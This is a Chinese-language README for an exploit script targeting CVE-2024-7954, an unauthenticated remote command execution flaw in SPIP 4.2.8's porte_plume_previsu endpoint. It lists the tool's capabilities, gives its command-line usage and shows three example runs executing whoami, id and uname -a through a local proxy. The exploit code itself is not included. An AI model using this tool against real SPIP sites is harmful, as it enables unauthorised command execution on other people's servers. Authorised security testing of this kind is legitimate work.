CVE-2024-7954 - SPIP 4.2.8 远程命令执行(RCE)漏洞利用
此脚本利用SPIP 4.2.8版本中通过porte_plume_previsu
端点存在的远程代码执行漏洞。该漏洞允许未经身份验证的攻击者通过精心构造的图像标签预览渲染注入PHP代码。
CVE ID: CVE-2024-7954
组件: SPIP CMS (porte_plume_previsu
)
影响: 未经身份验证的远程命令执行
严重性: 严重
漏洞利用能力
- 执行任意系统命令
- 获取实时命令输出
- 自动提取并显示IP地理位置信息
- 代理支持(Burp/ZAP或其他)
使用方法
1
|
python3 cve_2024_7954_rce.py --url <目标URL> --cmd <命令> [--proxy <IP:端口>]
|
示例1
1
|
python3 cve_2024_7954_rce.py --url <目标URL> --cmd "whoami" --proxy "127.0.0.1:8080"
|
Burp Suite 请求/响应:
示例2
1
|
python3 cve_2024_7954_rce.py --url <目标URL> --cmd "id" --proxy "127.0.0.1:8080"
|
Burp Suite 请求/响应:
示例3
1
|
python3 cve_2024_7954_rce.py --url <目标URL> --cmd "uname -a" --proxy "127.0.0.1:8080"
|
Burp Suite 请求/响应:
⚠️ 免责声明
此漏洞利用脚本仅用于授权的安全测试、防御性研究和教育目的。